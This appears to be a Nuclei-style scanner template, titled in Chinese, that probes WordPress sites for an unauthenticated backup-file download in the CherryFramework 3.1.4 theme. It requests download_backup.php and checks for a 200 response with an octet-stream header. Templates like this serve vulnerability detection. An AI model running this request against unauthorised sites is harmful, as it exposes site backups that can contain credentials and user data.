id: wordpress-CherryFramework

info:
  name: WordPress系统CherryFramework主题3.1.4备份文件下载
  author: str1am
  severity: high
  tags: wordpress,unauth

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/themes/CherryFramework/admin/data_management/download_backup.php"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "application/octet-stream"
        part: header
        condition: and
